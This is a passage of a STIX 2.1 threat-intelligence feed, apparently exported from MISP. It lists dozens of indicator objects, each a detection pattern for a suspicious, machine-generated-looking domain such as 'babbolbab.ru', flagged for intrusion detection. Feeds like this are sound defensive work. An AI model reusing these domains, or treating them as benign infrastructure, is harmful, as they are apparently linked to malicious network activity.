"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bbe-0c70-467c-8888-43bd950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babblihbab.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bbf-7d3c-467d-bf01-4d3a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babblohbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bc0-03d4-4efc-ba9d-4992950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babblulbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bc0-073c-405f-b290-485e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babbobbab.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bc1-c8b0-4eba-a75c-4bc9950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babbohbab.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bc2-e5a4-43d3-afc8-443d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babbolbab.host']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bc3-7ac4-4ee2-b833-4ea4950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babbolbab.ru']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bc4-eaf0-486d-b8e4-473c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babbrabbab2.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bc5-7fd8-4599-a033-40a2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babbrebbab.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bc6-f26c-4cc9-937c-42aa950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babbrebbab2.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bc6-ca68-40f8-9597-4f8c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babbrehbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bc8-9df0-43b1-9569-41d0950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babbribbab2.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bc8-568c-4d26-9ea4-4202950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babbrihbab.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bc9-78c4-4d49-a583-4dff950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babbrohbab.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bca-24b4-480b-b022-4769950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babbrulbab.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bcb-87a4-499b-abeb-4f0d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babbulbab.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bcc-35f8-4745-9bb7-46cf950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babchabbab.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bcd-ffcc-42c5-bbb9-49d4950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babchabbab2.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bce-6f50-4bbc-9dbd-4dff950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babchebbab2.ru']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bce-5a98-4e95-956a-4ca2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babchehbab.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bcf-6660-4f7c-afb3-40ba950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babchibbab.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bd0-13ac-43c7-8dba-4717950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babchihbab.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bd1-9608-4224-945c-4744950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babcholbab.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bd2-b970-4b10-a6ec-46dc950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babclabbab2.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bd3-483c-4469-9942-441f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babclebbab.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bd4-bdf4-4c3b-a80e-4946950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babclebbab2.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bd5-9ed8-4a29-bbe5-4ca4950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babclehbab.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bd6-276c-46d8-ad32-485d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babclibbab2.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bd7-ba08-4749-9c8a-4959950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babclihbab.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bd8-03e0-4d12-8e76-4ee9950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babclohbab.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bd8-68d0-4b2b-838c-4808950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babclulbab.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bd9-f8f0-4e5f-baa5-4839950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babcrabbab2.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bda-c920-4c78-b24f-4d3c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babcrambab.ru']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bdb-09b8-4929-a998-47ca950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babcrebbab.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bdc-a2c8-47ff-85d5-4b84950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babcrebbab2.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
